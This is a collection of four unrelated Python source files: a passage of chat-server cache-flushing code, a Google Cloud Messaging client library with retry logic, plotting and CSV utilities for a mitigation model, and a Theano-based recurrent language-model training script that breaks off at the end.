return "active_user_dicts_in_realm:%s" % (realm.id,)
active_bot_dict_fields = ['id', 'full_name', 'short_name',
'email', 'default_sending_stream__name',
'default_events_register_stream__name',
'default_all_public_streams', 'api_key',
'bot_owner__email', 'avatar_source'] # type: List[str]
def active_bot_dicts_in_realm_cache_key(realm):
# type: (Any) -> str
return "active_bot_dicts_in_realm:%s" % (realm.id,)
def get_stream_cache_key(stream_name, realm):
# type: (str, Any) -> str
from zerver.models import Realm
if isinstance(realm, Realm):
realm_id = realm.id
else:
realm_id = realm
return "stream_by_realm_and_name:%s:%s" % (
realm_id, make_safe_digest(stream_name.strip().lower()))
def update_user_profile_caches(user_profiles):
# type: (Iterable[Any]) -> Any
items_for_remote_cache = {}
for user_profile in user_profiles:
items_for_remote_cache[user_profile_by_email_cache_key(user_profile.email)] = (user_profile,)
items_for_remote_cache[user_profile_by_id_cache_key(user_profile.id)] = (user_profile,)
cache_set_many(items_for_remote_cache)
# Called by models.py to flush the user_profile cache whenever we save
# a user_profile object
def flush_user_profile(sender, **kwargs):
# type: (Any, **Any) -> None
user_profile = kwargs['instance']
update_user_profile_caches([user_profile])
# Invalidate our active_users_in_realm info dict if any user has changed
# the fields in the dict or become (in)active
if kwargs.get('update_fields') is None or \
len(set(active_user_dict_fields + ['is_active']) & set(kwargs['update_fields'])) > 0:
cache_delete(active_user_dicts_in_realm_cache_key(user_profile.realm))
# Invalidate our active_bots_in_realm info dict if any bot has
# changed the fields in the dict or become (in)active
if user_profile.is_bot and (kwargs['update_fields'] is None or
(set(active_bot_dict_fields + ['is_active']) &
set(kwargs['update_fields']))):
cache_delete(active_bot_dicts_in_realm_cache_key(user_profile.realm))
# Invalidate realm-wide alert words cache if any user in the realm has changed
# alert words
if kwargs.get('update_fields') is None or "alert_words" in kwargs['update_fields']:
cache_delete(realm_alert_words_cache_key(user_profile.realm))
# Called by models.py to flush various caches whenever we save
# a Realm object. The main tricky thing here is that Realm info is
# generally cached indirectly through user_profile objects.
def flush_realm(sender, **kwargs):
# type: (Any, **Any) -> None
realm = kwargs['instance']
users = realm.get_active_users()
update_user_profile_caches(users)
if realm.deactivated:
cache_delete(active_user_dicts_in_realm_cache_key(realm))
cache_delete(active_bot_dicts_in_realm_cache_key(realm))
cache_delete(realm_alert_words_cache_key(realm))
def realm_alert_words_cache_key(realm):
# type: (Any) -> str
return "realm_alert_words:%s" % (realm.domain,)
# Called by models.py to flush the stream cache whenever we save a stream
# object.
def flush_stream(sender, **kwargs):
# type: (Any, **Any) -> None
from zerver.models import UserProfile
stream = kwargs['instance']
items_for_remote_cache = {}
items_for_remote_cache[get_stream_cache_key(stream.name, stream.realm)] = (stream,)
cache_set_many(items_for_remote_cache)
if kwargs.get('update_fields') is None or 'name' in kwargs['update_fields'] and \
UserProfile.objects.filter(
Q(default_sending_stream=stream) |
Q(default_events_register_stream=stream)
).exists():
cache_delete(active_bot_dicts_in_realm_cache_key(stream.realm))
|
|
import requests
import json
from collections import defaultdict
import time
import random
from sys import version_info
import logging
import re
if version_info.major == 2:
from urllib2 import unquote
else:
from urllib.parse import unquote
GCM_URL = 'https://gcm-http.googleapis.com/gcm/send'
class GCMException(Exception):
pass
class GCMMalformedJsonException(GCMException):
pass
class GCMConnectionException(GCMException):
pass
class GCMAuthenticationException(GCMException):
pass
class GCMTooManyRegIdsException(GCMException):
pass
class GCMInvalidTtlException(GCMException):
pass
class GCMTopicMessageException(GCMException):
pass
# Exceptions from Google responses
class GCMMissingRegistrationException(GCMException):
pass
class GCMMismatchSenderIdException(GCMException):
pass
class GCMNotRegisteredException(GCMException):
pass
class GCMMessageTooBigException(GCMException):
pass
class GCMInvalidRegistrationException(GCMException):
pass
class GCMUnavailableException(GCMException):
pass
class GCMInvalidInputException(GCMException):
pass
# TODO: Refactor this to be more human-readable
# TODO: Use OrderedDict for the result type to be able to preserve the order of the messages returned by GCM server
def group_response(response, registration_ids, key):
# Pair up results and reg_ids
mapping = zip(registration_ids, response['results'])
# Filter by key
filtered = ((reg_id, res[key]) for reg_id, res in mapping if key in res)
# Grouping of errors and mapping of ids
if key in ['registration_id', 'message_id']:
grouping = dict(filtered)
else:
grouping = defaultdict(list)
for k, v in filtered:
grouping[v].append(k)
return grouping or None
def get_retry_after(response_headers):
retry_after = response_headers.get('Retry-After')
    if retry_after:
        # Parse from seconds (e.g. Retry-After: 120); requests returns header values as
        # strings, so accept both ints and digit strings here
        if isinstance(retry_after, int):
            return retry_after
        if str(retry_after).isdigit():
            return int(retry_after)
        # Parse from HTTP-Date (e.g. Retry-After: Fri, 31 Dec 1999 23:59:59 GMT)
        try:
            from email.utils import parsedate
            from calendar import timegm
            return timegm(parsedate(retry_after))
        except (TypeError, OverflowError, ValueError):
            return None
    return None
class Payload(object):
"""
Base Payload class which prepares data for HTTP requests
"""
# TTL in seconds
GCM_TTL = 2419200
topicPattern = re.compile('/topics/[a-zA-Z0-9-_.~%]+')
def __init__(self, **kwargs):
self.validate(kwargs)
self.__dict__.update(**kwargs)
def validate(self, options):
"""
Allow adding validation on each payload key
by defining `validate_{key_name}`
"""
for key, value in options.items():
validate_method = getattr(self, 'validate_%s' % key, None)
if validate_method:
validate_method(value)
def validate_time_to_live(self, value):
if not (0 <= value <= self.GCM_TTL):
raise GCMInvalidTtlException("Invalid time to live value")
def validate_registration_ids(self, registration_ids):
if len(registration_ids) > 1000:
raise GCMTooManyRegIdsException("Exceded number of registration_ids")
def validate_to(self, value):
if not re.match(Payload.topicPattern, value):
raise GCMInvalidInputException(
"Invalid topic name: {0}! Does not match the {1} pattern".format(value, Payload.topicPattern))
@property
def body(self):
raise NotImplementedError
class PlaintextPayload(Payload):
@property
def body(self):
# Safeguard for backwards compatibility
if 'registration_id' not in self.__dict__:
self.__dict__['registration_id'] = self.__dict__.pop(
'registration_ids', None
)
        # Inline data for the plaintext request
data = self.__dict__.pop('data')
for key, value in data.items():
self.__dict__['data.%s' % key] = value
return self.__dict__
class JsonPayload(Payload):
@property
def body(self):
return json.dumps(self.__dict__)
class GCM(object):
    # Time unit is milliseconds.
BACKOFF_INITIAL_DELAY = 1000
MAX_BACKOFF_DELAY = 1024000
logger = None
logging_handler = None
def __init__(self, api_key, proxy=None, timeout=None, debug=False):
""" api_key : google api key
url: url of gcm service.
proxy: can be string "http://host:port" or dict {'https':'host:port'}
timeout: timeout for every HTTP request, see 'requests' documentation for possible values.
"""
self.api_key = api_key
self.url = GCM_URL
if isinstance(proxy, str):
protocol = self.url.split(':')[0]
self.proxy = {protocol: proxy}
else:
self.proxy = proxy
self.timeout = timeout
self.debug = debug
self.retry_after = None
if self.debug:
GCM.enable_logging()
@staticmethod
def enable_logging(level=logging.DEBUG, handler=None):
"""
Helper for quickly adding a StreamHandler to the logger. Useful for debugging.
:param handler:
:param level:
:return: the handler after adding it
"""
if not handler:
# Use a singleton logging_handler instead of recreating it,
# so we can remove-and-re-add safely without having duplicate handlers
if GCM.logging_handler is None:
GCM.logging_handler = logging.StreamHandler()
GCM.logging_handler.setFormatter(logging.Formatter(
'[%(asctime)s - %(levelname)s - %(filename)s:%(lineno)s - %(funcName)s()] %(message)s'))
handler = GCM.logging_handler
GCM.logger = logging.getLogger(__name__)
GCM.logger.removeHandler(handler)
GCM.logger.addHandler(handler)
GCM.logger.setLevel(level)
GCM.log('Added a stderr logging handler to logger: {0}', __name__)
# Enable requests logging
requests_logger_name = 'requests.packages.urllib3'
requests_logger = logging.getLogger(requests_logger_name)
requests_logger.removeHandler(handler)
requests_logger.addHandler(handler)
requests_logger.setLevel(level)
GCM.log('Added a stderr logging handler to logger: {0}', requests_logger_name)
@staticmethod
def log(message, *data):
if GCM.logger and message:
GCM.logger.debug(message.format(*data))
@staticmethod
def construct_payload(**kwargs):
"""
Construct the dictionary mapping of parameters.
        Encodes the dictionary into JSON for JSON requests.
:return constructed dict or JSON payload
:raises GCMInvalidTtlException: if time_to_live is invalid
"""
is_json = kwargs.pop('is_json', True)
if is_json:
if 'topic' not in kwargs and 'registration_ids' not in kwargs:
raise GCMMissingRegistrationException("Missing registration_ids or topic")
elif 'topic' in kwargs and 'registration_ids' in kwargs:
raise GCMInvalidInputException(
"Invalid parameters! Can't have both 'registration_ids' and 'to' as input parameters")
if 'topic' in kwargs:
kwargs['to'] = '/topics/{}'.format(kwargs.pop('topic'))
elif 'registration_ids' not in kwargs:
raise GCMMissingRegistrationException("Missing registration_ids")
payload = JsonPayload(**kwargs).body
else:
payload = PlaintextPayload(**kwargs).body
return payload
def make_request(self, data, is_json=True, session=None):
"""
Makes a HTTP request to GCM servers with the constructed payload
:param data: return value from construct_payload method
:param session: requests.Session object to use for request (optional)
:raises GCMMalformedJsonException: if malformed JSON request found
:raises GCMAuthenticationException: if there was a problem with authentication, invalid api key
        :raises GCMConnectionException: if the connection to the GCM service fails
"""
headers = {
'Authorization': 'key=%s' % self.api_key,
}
if is_json:
headers['Content-Type'] = 'application/json'
else:
headers['Content-Type'] = 'application/x-www-form-urlencoded;charset=UTF-8'
GCM.log('Request URL: {0}', self.url)
GCM.log('Request headers: {0}', headers)
GCM.log('Request proxy: {0}', self.proxy)
GCM.log('Request timeout: {0}', self.timeout)
GCM.log('Request data: {0}', data)
GCM.log('Request is_json: {0}', is_json)
new_session = None
if not session:
session = new_session = requests.Session()
try:
response = session.post(
self.url, data=data, headers=headers,
proxies=self.proxy, timeout=self.timeout,
)
finally:
if new_session:
new_session.close()
GCM.log('Response status: {0} {1}', response.status_code, response.reason)
GCM.log('Response headers: {0}', response.headers)
GCM.log('Response data: {0}', response.text)
        # A Retry-After header may accompany 5xx responses or 200 responses reporting error:Unavailable
self.retry_after = get_retry_after(response.headers)
# Successful response
if response.status_code == 200:
if is_json:
response = response.json()
else:
response = response.content
return response
# Failures
if response.status_code == 400:
raise GCMMalformedJsonException(
"The request could not be parsed as JSON")
elif response.status_code == 401:
raise GCMAuthenticationException(
"There was an error authenticating the sender account")
elif response.status_code == 503:
raise GCMUnavailableException("GCM service is unavailable")
else:
error = "GCM service error: %d" % response.status_code
raise GCMUnavailableException(error)
@staticmethod
def raise_error(error):
if error == 'InvalidRegistration':
raise GCMInvalidRegistrationException("Registration ID is invalid")
elif error == 'Unavailable':
# Plain-text requests will never return Unavailable as the error code.
# http://developer.android.com/guide/google/gcm/gcm.html#error_codes
raise GCMUnavailableException(
"Server unavailable. Resent the message")
elif error == 'NotRegistered':
raise GCMNotRegisteredException(
"Registration id is not valid anymore")
elif error == 'MismatchSenderId':
raise GCMMismatchSenderIdException(
"A Registration ID is tied to a certain group of senders")
elif error == 'MessageTooBig':
raise GCMMessageTooBigException("Message can't exceed 4096 bytes")
elif error == 'MissingRegistration':
raise GCMMissingRegistrationException("Missing registration")
def handle_plaintext_response(self, response):
if type(response) not in [bytes, str]:
raise TypeError("Invalid type for response parameter! Expected: bytes or str. "
"Actual: {0}".format(type(response).__name__))
# Split response by line
if version_info.major == 3 and type(response) is bytes:
response = response.decode("utf-8", "strict")
response_lines = response.strip().split('\n')
# Split the first line by =
key, value = response_lines[0].split('=')
# Error on first line
if key == 'Error':
self.raise_error(value)
else: # Canonical_id from the second line
if len(response_lines) == 2:
return unquote(response_lines[1].split('=')[1])
return None # TODO: Decide a way to return message id without breaking backwards compatibility
# unquote(value) # ID of the sent message (from the first line)
@staticmethod
def handle_json_response(response, registration_ids):
errors = group_response(response, registration_ids, 'error')
canonical = group_response(response, registration_ids, 'registration_id')
success = group_response(response, registration_ids, 'message_id')
info = {}
if errors:
info.update({'errors': errors})
if canonical:
info.update({'canonical': canonical})
if success:
info.update({'success': success})
return info
@staticmethod
def handle_topic_response(response):
error = response.get('error')
if error:
raise GCMTopicMessageException(error)
return response['message_id']
@staticmethod
def extract_unsent_reg_ids(info):
if 'errors' in info and 'Unavailable' in info['errors']:
return info['errors']['Unavailable']
return []
def plaintext_request(self, **kwargs):
"""
Makes a plaintext request to GCM servers
        :return the canonical registration id from the response if one was returned, otherwise None
"""
if 'registration_id' not in kwargs:
raise GCMMissingRegistrationException("Missing registration_id")
elif not kwargs['registration_id']:
raise GCMMissingRegistrationException("Empty registration_id")
kwargs['is_json'] = False
retries = kwargs.pop('retries', 5)
session = kwargs.pop('session', None)
payload = self.construct_payload(**kwargs)
backoff = self.BACKOFF_INITIAL_DELAY
info = None
has_error = False
for attempt in range(retries):
try:
response = self.make_request(payload, is_json=False, session=session)
info = self.handle_plaintext_response(response)
has_error = False
except GCMUnavailableException:
has_error = True
if self.retry_after:
GCM.log("[plaintext_request - Attempt #{0}] Retry-After ~> Sleeping for {1} seconds".format(attempt,
self.retry_after))
time.sleep(self.retry_after)
self.retry_after = None
elif has_error:
sleep_time = backoff / 2 + random.randrange(backoff)
nap_time = float(sleep_time) / 1000
GCM.log(
"[plaintext_request - Attempt #{0}]Backoff ~> Sleeping for {1} seconds".format(attempt, nap_time))
time.sleep(nap_time)
if 2 * backoff < self.MAX_BACKOFF_DELAY:
backoff *= 2
else:
break
if has_error:
raise IOError("Could not make request after %d attempts" % retries)
return info
def json_request(self, **kwargs):
"""
Makes a JSON request to GCM servers
:param kwargs: dict mapping of key-value pairs of parameters
        :return: dict summarising the response, with optional 'errors', 'canonical' and 'success' results grouped by registration ID
"""
if 'registration_ids' not in kwargs:
raise GCMMissingRegistrationException("Missing registration_ids")
elif not kwargs['registration_ids']:
raise GCMMissingRegistrationException("Empty registration_ids")
args = dict(**kwargs)
retries = args.pop('retries', 5)
session = args.pop('session', None)
payload = self.construct_payload(**args)
registration_ids = args['registration_ids']
backoff = self.BACKOFF_INITIAL_DELAY
info = None
has_error = False
for attempt in range(retries):
try:
response = self.make_request(payload, is_json=True, session=session)
info = self.handle_json_response(response, registration_ids)
unsent_reg_ids = self.extract_unsent_reg_ids(info)
has_error = False
except GCMUnavailableException:
unsent_reg_ids = registration_ids
has_error = True
if unsent_reg_ids:
registration_ids = unsent_reg_ids
# Make the retry request with the unsent registration ids
args['registration_ids'] = registration_ids
payload = self.construct_payload(**args)
if self.retry_after:
GCM.log("[json_request - Attempt #{0}] Retry-After ~> Sleeping for {1}".format(attempt,
self.retry_after))
time.sleep(self.retry_after)
self.retry_after = None
else:
sleep_time = backoff / 2 + random.randrange(backoff)
nap_time = float(sleep_time) / 1000
GCM.log("[json_request - Attempt #{0}] Backoff ~> Sleeping for {1}".format(attempt, nap_time))
time.sleep(nap_time)
if 2 * backoff < self.MAX_BACKOFF_DELAY:
backoff *= 2
else:
break
if has_error:
raise IOError("Could not make request after %d attempts" % retries)
return info
def send_downstream_message(self, **kwargs):
return self.json_request(**kwargs)
def send_topic_message(self, **kwargs):
"""
Publish Topic Messaging to GCM servers
Ref: https://developers.google.com/cloud-messaging/topic-messaging
:param kwargs: dict mapping of key-value pairs of parameters
:return message_id
:raises GCMInvalidInputException: if the topic is empty
"""
if 'topic' not in kwargs:
raise GCMInvalidInputException("Topic name missing!")
elif not kwargs['topic']:
raise GCMInvalidInputException("Topic name cannot be empty!")
retries = kwargs.pop('retries', 5)
session = kwargs.pop('session', None)
payload = self.construct_payload(**kwargs)
backoff = self.BACKOFF_INITIAL_DELAY
for attempt in range(retries):
try:
response = self.make_request(payload, is_json=True, session=session)
return self.handle_topic_response(response)
except (GCMUnavailableException, GCMTopicMessageException):
if self.retry_after:
GCM.log("[send_topic_message - Attempt #{0}] Retry-After ~> Sleeping for {1}"
.format(attempt, self.retry_after))
time.sleep(self.retry_after)
self.retry_after = None
else:
sleep_time = backoff / 2 + random.randrange(backoff)
nap_time = float(sleep_time) / 1000
GCM.log("[send_topic_message - Attempt #{0}] Backoff ~> Sleeping for {1}".format(attempt, nap_time))
time.sleep(nap_time)
if 2 * backoff < self.MAX_BACKOFF_DELAY:
backoff *= 2
raise IOError("Could not make request after %d attempts" % retries)
|
|
import numpy as np
import csv
################
### Plotting ###
################
markers = (u'o', u'v', u'^', u'<', u'>', u'8', u's', u'p', u'*', u'h', u'H', u'D', u'd')
def plot(y_data, x_data, index=None, y_index=None, title=None, xlabel=None, ylabel=None,
legend=None, vertical_line=None, save=False, file_name=None, points=False):
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_style("whitegrid", {"font.family": [u'Bitstream Vera Sans']})
sns.set_palette("PuBuGn_d")
#sns.set_palette("RdBu_r")
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
if len(y_data.shape)==1:
ax.plot(x_data, y_data, label=legend)
if points:
ax.scatter(x_data, y_data)
else:
for i in range(len(y_data)):
ax.plot(x_data, y_data[i], label=legend[i])
if points:
ax.plot(x_data, y_data[i], markers[i])
ax.xaxis.grid(False)
if vertical_line is not None:
ax.axvline(x=vertical_line, linestyle='dashed', linewidth=1, color='black')
if index is not None:
ax.set_xticklabels(index)
if y_index is not None:
ax.set_yticklabels(y_index)
if title is not None:
ax.set_title(title, fontsize='large')
if xlabel is not None:
ax.set_xlabel(xlabel, fontsize='large')
if ylabel is not None:
ax.set_ylabel(ylabel, fontsize='large')
if legend is not None:
plt.legend(fontsize='large', loc='best')
ymin, ymax = ax.get_ylim()
diff = ymax - ymin
ax.set_ylim(ymin-diff*0.1, ymax+diff*0.1)
if save:
d = find_path(file_name, "plots", ".png")
plt.savefig(d)
plt.close(fig)
plt.show()
def plot_dict(dictionary, title, xlabel, ylabel):
    # dict.items() yields (key, value) pairs; unzip them into x (keys) and y (values).
    x_data, y_data = zip(*dictionary.items())
    plot(np.array(y_data), np.array(x_data), title=title, xlabel=xlabel, ylabel=ylabel)
def plot_mitigation_at_node(m, node, utility, save=False, prefix=""):
m_copy = m.copy()
x = np.append(np.linspace(0.0, m[node], 25), np.linspace(m[node], m[node]+0.05, 25))
x = np.unique(x)
y = np.zeros(len(x))
for i in range(len(x)):
m_copy[node] = x[i]
y[i] = utility.utility(m_copy)
plot(y, x, title="Utility vs. Mitigation in Node {}".format(node), xlabel="Mitigation",
ylabel="Utility", vertical_line=m[node], save=save, file_name=prefix+"MAT_{}".format(node))
def change_mitigation(m, u, add_nodes, reduce_nodes, delta):
m_copy = m.copy()
cache = set()
for node in add_nodes:
m_copy[node] += 0.01
cache.add(node)
wec, bec = u.tree.reachable_end_states(node)
for next_node in range(31+wec, 32+bec):
if next_node not in cache:
m_copy[next_node] += delta
cache.add(next_node)
else:
print(next_node)
for node in reduce_nodes:
m_copy[node] -= 0.01
cache.add(node)
wec, bec = u.tree.reachable_end_states(node)
for next_node in range(31+wec, 32+bec):
if next_node not in cache:
m_copy[next_node] -= delta
cache.add(next_node)
else:
print(next_node)
return m_copy
def marginal_analysis(m, u, add_nodes, reduce_nodes, delta):
utility_t, cons_t, cost_t, ce_t = u.utility(m, return_trees=True)
new_m = change_mitigation(m, u, add_nodes, reduce_nodes, delta)
new_utility_t, new_cons_t, new_cost_t, new_ce_t = u.utility(new_m, return_trees=True)
for period in cost_t.periods:
new_utility_t.tree[period] -= utility_t[period]
new_cons_t.tree[period] -= cons_t[period]
new_cost_t.tree[period] -= cost_t[period]
return new_utility_t, new_cons_t, new_cost_t
def plot_first_order_condition(m, node, utility):
x = np.array([1.0/(10)**i for i in range(1, 11)])
y = np.zeros(len(x))
for i in range(len(x)):
grad, k = utility.partial_grad(m, node, x[i])
y[i] = grad
plot(y, x, title="First Order Check for node {}".format(node), xlabel="Delta",
ylabel="Partial deriv. w.r.t. Mitigation")
###########
### I/O ###
###########
def find_path(file_name, directory="data", file_type=".csv"):
import os
cwd = os.getcwd()
if not os.path.exists(directory):
os.makedirs(directory)
d = os.path.join(cwd, os.path.join(directory,file_name+file_type))
return d
def create_file(file_name):
import os
d = find_path(file_name)
if not os.path.isfile(d):
open(d, 'w').close()
return d
def file_exists(file_name):
import os
d = find_path(file_name)
return os.path.isfile(d)
def load_csv(file_name, delimiter=';', comment=None):
    # Minimal implementation (the original body was a stub): delegate to numpy.
    d = find_path(file_name)
    return np.genfromtxt(d, delimiter=delimiter,
                         comments=comment if comment is not None else '#')
def write_columns_csv(lst, file_name, header=[], index=None, start_char=None, delimiter=';', open_as='wb'):
d = find_path(file_name)
if index is not None:
index.extend(lst)
output_lst = zip(*index)
else:
output_lst = zip(*lst)
with open(d, open_as) as f:
writer = csv.writer(f, delimiter=delimiter)
if start_char is not None:
writer.writerow([start_char])
if header:
writer.writerow(header)
for row in output_lst:
writer.writerow(row)
def write_columns_to_existing(lst, file_name, header="", delimiter=';'):
d = find_path(file_name)
with open(d, 'r') as finput:
reader = csv.reader(finput, delimiter=delimiter)
all_lst = []
row = next(reader)
nested_list = isinstance(lst[0], list) or isinstance(lst[0], np.ndarray)
if nested_list:
lst = zip(*lst)
row.extend(header)
else:
row.append(header)
all_lst.append(row)
n = len(lst)
i = 0
for row in reader:
if nested_list:
row.extend(lst[i])
else:
row.append(lst[i])
all_lst.append(row)
i += 1
with open(d, 'w') as foutput:
writer = csv.writer(foutput, delimiter=delimiter)
writer.writerows(all_lst)
def append_to_existing(lst, file_name, header="", index=None, delimiter=';', start_char=None):
write_columns_csv(lst, file_name, header, index, start_char=start_char, delimiter=delimiter, open_as='a')
def import_csv(file_name, delimiter=';', header=True, indices=None, start_at=0, break_at='\n', ignore=""):
d = find_path(file_name)
input_lst = []
indices_lst = []
with open(d, 'r') as f:
reader = csv.reader(f, delimiter=delimiter)
for _ in range(0, start_at):
next(reader)
if header:
header_row = next(reader)
for row in reader:
if row[0] == break_at:
break
if row[0] == ignore:
continue
if indices:
input_lst.append(row[indices:])
indices_lst.append(row[:indices])
else:
input_lst.append(row)
if header and not indices :
return header_row, np.array(input_lst, dtype="float64")
elif header and indices:
return header_row[indices:], indices_lst, np.array(input_lst, dtype="float64")
return np.array(input_lst, dtype="float64")
##########
### MP ###
##########
def _pickle_method(method):
func_name = method.im_func.__name__
obj = method.im_self
cls = method.im_class
if func_name.startswith('__') and not func_name.endswith('__'): #deal with mangled names
cls_name = cls.__name__.lstrip('_')
func_name = '_' + cls_name + func_name
return _unpickle_method, (func_name, obj, cls)
def _unpickle_method(func_name, obj, cls):
for cls in cls.__mro__:
try:
func = cls.__dict__[func_name]
except KeyError:
pass
else:
break
return func.__get__(obj, cls)
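# Example (hedged sketch): registering the two helpers above so that bound
# methods can be pickled, e.g. when handing them to a multiprocessing.Pool.
# This assumes Python 2, where copy_reg and im_func/im_self/im_class exist.
#
#     import copy_reg
#     import types
#     copy_reg.pickle(types.MethodType, _pickle_method, _unpickle_method)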
|
|
"""
Test of the classical LM model for language modelling
"""
from groundhog.datasets import LMIterator
from groundhog.trainer.SGD_momentum import SGD as SGD_m
from groundhog.trainer.SGD import SGD
from groundhog.mainLoop import MainLoop
from groundhog.layers import MultiLayer, \
RecurrentMultiLayer, \
RecurrentMultiLayerInp, \
RecurrentMultiLayerShortPath, \
RecurrentMultiLayerShortPathInp, \
RecurrentMultiLayerShortPathInpAll, \
SoftmaxLayer, \
LastState,\
UnaryOp, \
Operator, \
Shift, \
GaussianNoise, \
SigmoidLayer
from groundhog.layers import maxpool, \
maxpool_ntimes, \
last, \
last_ntimes,\
tanh, \
sigmoid, \
rectifier,\
hard_sigmoid, \
hard_tanh
from groundhog.models import LM_Model
from theano import scan
import numpy
import theano
import theano.tensor as TT
linear = lambda x:x
theano.config.allow_gc = False
def get_text_data(state):
def out_format (x, y, r):
return {'x':x, 'y' :y, 'reset': r}
def out_format_valid (x, y, r):
return {'x':x, 'y' :y, 'reset': r}
train_data = LMIterator(
batch_size=state['bs'],
path = state['path'],
stop=-1,
seq_len = state['seqlen'],
mode="train",
chunks=state['chunks'],
shift = state['shift'],
output_format = out_format,
can_fit=True)
valid_data = LMIterator(
batch_size=state['bs'],
path=state['path'],
stop=-1,
use_infinite_loop=False,
allow_short_sequences = True,
seq_len= state['seqlen'],
mode="valid",
reset =state['reset'],
chunks=state['chunks'],
shift = state['shift'],
output_format = out_format_valid,
can_fit=True)
test_data = LMIterator(
batch_size=state['bs'],
path = state['path'],
stop=-1,
use_infinite_loop=False,
allow_short_sequences=True,
seq_len= state['seqlen'],
mode="test",
chunks=state['chunks'],
shift = state['shift'],
output_format = out_format_valid,
can_fit=True)
if 'wiki' in state['path']:
test_data = None
return train_data, valid_data, test_data
def jobman(state, channel):
# load dataset
rng = numpy.random.RandomState(state['seed'])
# declare the dimensionalies of the input and output
if state['chunks'] == 'words':
state['n_in'] = 10000
state['n_out'] = 10000
else:
state['n_in'] = 50
state['n_out'] = 50
train_data, valid_data, test_data = get_text_data(state)
## BEGIN Tutorial
### Define Theano Input Variables
x = TT.lvector('x')
y = TT.lvector('y')
h0 = theano.shared(numpy.zeros((eval(state['nhids'])[-1],), dtype='float32'))
### Neural Implementation of the Operators: \oplus
#### Word Embedding
emb_words = MultiLayer(
rng,
n_in=state['n_in'],
n_hids=eval(state['inp_nhids']),
activation=eval(state['inp_activ']),
init_fn='sample_weights_classic',
weight_noise=state['weight_noise'],
rank_n_approx = state['rank_n_approx'],
scale=state['inp_scale'],
sparsity=state['inp_sparse'],
learn_bias = True,
bias_scale=eval(state['inp_bias']),
name='emb_words')
#### Deep Transition Recurrent Layer
rec = eval(state['rec_layer'])(
rng,
eval(state['nhids']),
activation = eval(state['rec_activ']),
#activation = 'TT.nnet.sigmoid',
bias_scale = eval(state['rec_bias']),
scale=eval(state['rec_scale']),
sparsity=eval(state['rec_sparse']),
init_fn=eval(state['rec_init']),
weight_noise=state['weight_noise'],
name='rec')
    #### Stitching them together
##### (1) Get the embedding of a word
x_emb = emb_words(x, no_noise_bias=state['no_noise_bias'])
##### (2) Embedding + Hidden State via DT Recurrent Layer
reset = TT.scalar('reset')
rec_layer = rec(x_emb, n_steps=x.shape[0],
init_state=h0*reset,
no_noise_bias=state['no_noise_bias'],
truncate_gradient=state['truncate_gradient'],
batch_size=1)
### Neural Implementation of the Operators: \lhd
#### Softmax Layer
output_layer = SoftmaxLayer(
rng,
eval(state['nhids'])[-1],
state['n_out'],
scale=state['out_scale'],
bias_scale=state['out_bias_scale'],
init_fn="sample_weights_classic",
weight_noise=state['weight_noise'],
sparsity=state['out_sparse'],
sum_over_time=True,
name='out')
### Few Optional Things
#### Direct shortcut from x to y
if state['shortcut_inpout']:
shortcut = MultiLayer(
rng,
n_in=state['n_in'],
n_hids=eval(state['inpout_nhids']),
activations=eval(state['inpout_activ']),
init_fn='sample_weights_classic',
weight_noise = state['weight_noise'],
scale=eval(state['inpout_scale']),
sparsity=eval(state['inpout_sparse']),
learn_bias=eval(state['inpout_learn_bias']),
bias_scale=eval(state['inpout_bias']),
name='shortcut')
#### Learning rate scheduling (1/(1+n/beta))
state['clr'] = state['lr']
def update_lr(obj, cost):
stp = obj.step
if isinstance(obj.state['lr_start'], int) and stp > obj.state['lr_start']:
time = float(stp - obj.state['lr_start'])
new_lr = obj.state['clr']/(1+time/obj.state['lr_beta'])
obj.lr = new_lr
if state['lr_adapt']:
rec.add_schedule(update_lr)
### Neural Implementations of the Language Model
#### Training
if state['shortcut_inpout']:
train_model = output_layer(rec_layer,
no_noise_bias=state['no_noise_bias'],
additional_inputs=[shortcut(x)]).train(target=y,
scale=numpy.float32(1./state['seqlen']))
else:
train_model = output_layer(rec_layer,
no_noise_bias=state['no_noise_bias']).train(target=y,
scale=numpy.float32(1./state['seqlen']))
nw_h0 = rec_layer.out[rec_layer.out.shape[0]-1]
if state['carry_h0']:
train_model.updates += [(h0, nw_h0)]
#### Validation
h0val = theano.shared(numpy.zeros((eval(state['nhids'])[-1],), dtype='float32'))
rec_layer = rec(emb_words(x, use_noise=False),
n_steps = x.shape[0],
batch_size=1,
init_state=h0val*reset,
use_noise=False)
nw_h0 = rec_layer.out[rec_layer.out.shape[0]-1]
if not state['shortcut_inpout']:
valid_model = output_layer(rec_layer,
use_noise=False).validate(target=y, sum_over_time=True)
else:
valid_model = output_layer(rec_layer,
additional_inputs=[shortcut(x, use_noise=False)],
use_noise=False).validate(target=y, sum_over_time=True)
valid_updates = []
if state['carry_h0']:
valid_updates = [(h0val, nw_h0)]
valid_fn = theano.function([x,y, reset], valid_model.cost,
name='valid_fn', updates=valid_updates)
#### Sampling
##### single-step sampling
def sample_fn(word_tm1, h_tm1):
x_emb = emb_words(word_tm1, use_noise = False, one_step=True)
h0 = rec(x_emb, state_before=h_tm1, one_step=True, use_noise=False)[-1]
word = output_layer.get_sample(state_below=h0, temp=1.)
return word, h0
##### scan for iterating the single-step sampling multiple times
[samples, summaries], updates = scan(sample_fn,
states = [
TT.alloc(numpy.int64(0), state['sample_steps']),
TT.alloc(numpy.float32(0), 1, eval(state['nhids'])[-1])],
n_steps= state['sample_steps'],
name='sampler_scan')
##### define a Theano function
sample_fn = theano.function([], [samples],
updates=updates, profile=False, name='sample_fn')
##### Load a dictionary
dictionary = numpy.load(state['dictionary'])
if state['chunks'] == 'chars':
dictionary = dictionary['unique_chars']
else:
dictionary = dictionary['unique_words']
def hook_fn():
sample = sample_fn()[0]
print 'Sample:',
if state['chunks'] == 'chars':
print "".join(dictionary[sample])
else:
for si in sample:
print dictionary[si],
print
### Build and Train a Model
#### Define a model
model = LM_Model(
cost_layer = train_model,
weight_noise_amount=state['weight_noise_amount'],
valid_fn = valid_fn,
clean_before_noise_fn = False,
noise_fn = None,
rng = rng)
if state['reload']:
model.load(state['prefix']+'model.npz')
#### Define a trainer
##### Training algorithm (SGD)
if state['moment'] < 0:
algo = SGD(model, state, train_data)
else:
algo = SGD_m(model, state, train_data)
##### Main loop of the trainer
main = MainLoop(train_data,
valid_data,
test_data,
model,
algo,
state,
channel,
train_cost = False,
hooks = hook_fn,
validate_postprocess = eval(state['validate_postprocess']))
main.main()
## END Tutorial
if __name__=='__main__':
state = {}
# complete path to data (cluster specific)
state['seqlen'] = 100
state['path']= "/data/lisa/data/PennTreebankCorpus/pentree_char_and_word.npz"
